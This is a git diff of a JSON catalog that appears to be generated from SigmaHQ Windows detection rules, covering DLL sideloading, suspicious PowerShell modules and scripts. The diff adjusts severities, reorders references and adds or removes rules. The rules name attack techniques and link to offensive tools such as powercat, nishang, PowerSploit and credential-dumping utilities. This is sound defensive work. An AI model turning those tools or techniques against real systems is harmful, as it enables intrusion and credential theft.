"https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992",
+ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml"
],
"tags": [
@@ -23349,7 +23009,7 @@
"Legitimate applications loading their own versions of the DLL mentioned in this rule"
],
"filename": "image_load_side_load_dbgcore_dll.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
@@ -23381,7 +23041,7 @@
}
],
"uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7",
- "value": "DLL Sideloading Of DBGCORE.DLL"
+ "value": "Potential DLL Sideloading Of DBGCORE.DLL"
},
{
"description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor",
@@ -23396,8 +23056,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
"http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp",
+ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml"
],
"tags": [
@@ -23548,10 +23208,10 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://hijacklibs.net/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
"https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://hijacklibs.net/",
+ "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml"
],
"tags": [
@@ -23672,8 +23332,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=2921",
"https://github.com/p3nt4/PowerShdll",
+ "https://adsecurity.org/?p=2921",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"
],
"tags": [
@@ -23902,8 +23562,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.py2exe.org/",
"https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/",
+ "https://www.py2exe.org/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml"
],
"tags": [
@@ -23936,10 +23596,10 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
+ "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
+ "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
"https://thewover.github.io/Introducing-Donut/",
"https://github.com/tyranid/DotNetToJScript",
- "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html",
- "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"
],
"tags": [
@@ -23973,9 +23633,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump",
"https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html",
+ "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml"
],
"tags": [
@@ -24008,8 +23668,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
"https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_malware_pingback_backdoor.yml"
],
"tags": [
@@ -24075,8 +23735,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
"https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets",
+ "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml"
],
"tags": [
@@ -24115,7 +23775,7 @@
"Legitimate applications loading their own versions of the DLL mentioned in this rule"
],
"filename": "image_load_side_load_dbghelp_dll.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
@@ -24147,7 +23807,7 @@
}
],
"uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784",
- "value": "DLL Sideloading Of DBGHELP.DLL"
+ "value": "Potential DLL Sideloading Of DBGHELP.DLL"
},
{
"description": "Detects SILENTTRINITY stager dll loading activity",
@@ -24294,8 +23954,8 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html",
"https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html",
+ "https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_libvlc.yml"
],
"tags": [
@@ -24490,63 +24150,6 @@
"uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac",
"value": "GAC DLL Loaded Via Office Applications"
},
- {
- "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/09/07",
- "falsepositive": [
- "Rarely observed"
- ],
- "filename": "image_load_usp_svchost_clfsw32.yml",
- "level": "high",
- "logsource.category": "image_load",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055"
- ]
- },
- "related": [
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc",
- "value": "APT PRIVATELOG Image Load Pattern"
- },
- {
- "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/31",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "image_load_malware_3cx_compromise_susp_dll.yml",
- "level": "critical",
- "logsource.category": "image_load",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_malware_3cx_compromise_susp_dll.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "d0b65ad3-e945-435e-a7a9-438e62dd48e9",
- "value": "Malicious DLL Load By Compromised 3CXDesktopApp"
- },
{
"description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n",
"meta": {
@@ -24856,6 +24459,49 @@
"uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f",
"value": "Microsoft Office DLL Sideload"
},
+ {
+ "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "image_load_side_load_gup_libcurl.yml",
+ "level": "medium",
+ "logsource.category": "image_load",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1574.001",
+ "attack.t1574.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e",
+ "value": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE"
+ },
{
"description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.",
"meta": {
@@ -24902,9 +24548,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
"https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa",
+ "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml"
],
"tags": [
@@ -24971,9 +24617,9 @@
"logsource.category": "image_load",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mattifestation/status/1196390321783025666",
"https://twitter.com/oulusoyum/status/1191329746069655553",
"https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
+ "https://twitter.com/mattifestation/status/1196390321783025666",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml"
],
"tags": [
@@ -25090,8 +24736,8 @@
"logsource.product": "windows",
"refs": [
"https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/",
- "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
"https://github.com/RiccardoAncarani/LiquidSnake",
+ "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml"
],
"tags": [
@@ -25124,8 +24770,8 @@
"logsource.category": "ps_classic_start",
"logsource.product": "windows",
"refs": [
- "https://github.com/besimorhino/powercat",
"https://nmap.org/ncat/",
+ "https://github.com/besimorhino/powercat",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml"
],
@@ -25160,8 +24806,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/bohops/WSMan-WinRM",
- "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://twitter.com/chadtilbury/status/1275851297770610688",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml"
],
"tags": [
@@ -25725,8 +25371,8 @@
"logsource.product": "windows",
"refs": [
"https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
- "https://www.mdeditor.tw/pl/pgRt",
"https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
+ "https://www.mdeditor.tw/pl/pgRt",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml"
],
"tags": [
@@ -25760,8 +25406,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml"
],
"tags": [
@@ -25786,8 +25432,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/16",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml"
],
"tags": [
@@ -25820,8 +25466,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml"
],
"tags": [
@@ -26004,8 +25650,8 @@
"logsource.category": "ps_module",
"logsource.product": "windows",
"refs": [
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
"https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md",
+ "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml"
],
"tags": [
@@ -26114,19 +25760,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml"
],
@@ -26493,22 +26142,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/NetSPI/PowerUpSQL",
"https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
"https://github.com/samratashok/nishang",
- "https://github.com/AlsidOfficial/WSUSpendu/",
- "https://github.com/nettitude/Invoke-PowerThIEf",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
"https://github.com/besimorhino/powercat",
"https://github.com/PowerShellMafia/PowerSploit",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
- "https://github.com/S3cur3Th1sSh1t/WinPwn",
+ "https://github.com/AlsidOfficial/WSUSpendu/",
"https://github.com/CsEnox/EventViewer-UACBypass",
+ "https://github.com/nettitude/Invoke-PowerThIEf",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
- "https://github.com/NetSPI/PowerUpSQL",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
+ "https://github.com/S3cur3Th1sSh1t/WinPwn",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml"
],
"tags": [
@@ -27332,8 +26981,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
+ "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml"
],
"tags": [
@@ -27450,10 +27099,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://powersploit.readthedocs.io/en/stable/Recon/README",
"https://adsecurity.org/?p=2277",
- "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
+ "https://powersploit.readthedocs.io/en/stable/Recon/README",
"https://thedfirreport.com/2020/10/08/ryuks-return",
+ "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml"
],
"tags": [
@@ -27528,8 +27177,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"
],
"tags": [
@@ -27630,9 +27279,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml"
],
"tags": [
@@ -27652,6 +27301,40 @@
"uuid": "db885529-903f-4c5d-9864-28fe199e6370",
"value": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell"
},
+ {
+ "description": "Detects calls to \"Add-Content\" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2021/08/18",
+ "falsepositive": [
+ "Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session"
+ ],
+ "filename": "posh_ps_user_profile_tampering.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.privilege_escalation",
+ "attack.t1546.013"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152",
+ "value": "Potential Persistence Via PowerShell User Profile Using Add-Content"
+ },
{
"description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)",
"meta": {
@@ -27833,10 +27516,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php",
"http://woshub.com/manage-windows-firewall-powershell/",
- "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html",
"https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell",
+ "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php",
+ "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html",
"https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml"
],
@@ -27870,8 +27553,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell",
+ "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml"
],
"tags": [
@@ -28027,10 +27710,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://youtu.be/5mqid-7zp8k?t=2481",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
+ "https://youtu.be/5mqid-7zp8k?t=2481",
"https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml"
],
"tags": [
@@ -28106,6 +27789,40 @@
"uuid": "7d416556-6502-45b2-9bad-9d2f05f38997",
"value": "Powershell Sensitive File Discovery"
},
+ {
+ "description": "Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/05",
+ "falsepositive": [
+ "The same functionality can be implemented by admin scripts, correlate with name and creator"
+ ],
+ "filename": "posh_ps_resolve_list_of_ip_from_file.yml",
+ "level": "medium",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://www.fortypoundhead.com/showcontent.asp?artid=24022",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "fbc5e92f-3044-4e73-a5c6-1c4359b539de",
+ "value": "PowerShell Script With File Hostname Resolving Capabilities"
+ },
{
"description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n",
"meta": {
@@ -28248,8 +27965,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.powershellgallery.com/packages/DSInternals",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount",
+ "https://www.powershellgallery.com/packages/DSInternals",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml"
],
"tags": [
@@ -28324,8 +28041,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://adsecurity.org/?p=2604",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml"
],
@@ -28521,39 +28238,6 @@
"uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b",
"value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell"
},
- {
- "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/08/18",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "posh_ps_trigger_profiles.yml",
- "level": "medium",
- "logsource.category": "ps_script",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml"
- ],
- "tags": [
